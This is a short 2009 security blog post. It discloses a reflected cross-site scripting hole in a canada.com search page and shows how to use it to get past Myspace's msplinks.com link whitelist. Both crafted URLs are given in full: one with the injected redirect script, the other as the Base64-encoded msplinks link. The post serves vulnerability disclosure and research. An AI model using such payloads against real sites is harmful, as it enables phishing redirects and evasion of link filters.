skip to main | skip to sidebar

XSS - Cross-Site Scripting

And Other Web Related Deception

This site is soon to be deprecated by http://www.johnleitch.net

Sunday, October 4, 2009

Bypassing Msplinks.com Revisited - Myspace.com

The technique I previously blogged about still works, but ytmnd.com has fixed the XSS vulnerability used in that posting. Here's a hole in another Msplinks.com whitelisted site:

http://www.canada.com/search/search.html?q=')}window.location='http://cross-site-scripting.blogspot.com/';{('

Just as before 01 is prefixed to the XSS redirect URL, then the result is Base64 encoded and appended to http://www.msplinks.com/.

http://www.msplinks.com/MDFodHRwOi8vd3d3LmNhbmFkYS5jb20vc2VhcmNoL3NlYXJjaC5odG1sP3E9Jyl9d2luZG93LmxvY2F0aW9uPSdodHRwOi8vY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuYmxvZ3Nwb3QuY29tLyc7eygn

Posted by John Leitch at 3:50 PM 5 comments

Labels: cross-site scripting, hacking, javascript, msplinks.com, myspace.com, programming, security, social engineering, web development, xss

Newer Posts Older Posts Home

Subscribe to: Posts (Atom)

About Me

John Leitch

View my complete profile

Blog Archive

► 2010 (71)
- ► July (28)
- ► June (2)
- ► May (27)
- ► April (7)
- ► March (7)

▼ 2009 (20)
- ► November (2)
- ▼ October (1)
  - Bypassing Msplinks.com Revisited - Myspace.com
- ► September (6)
- ► August (2)
- ► June (3)
- ► May (6)

Blog Catalog

Computer Security Blogs - BlogCatalog Blog Directory

Blogflux

Blog Flux Local - Michigan

Blogged

Programming Blog Directory

Blogville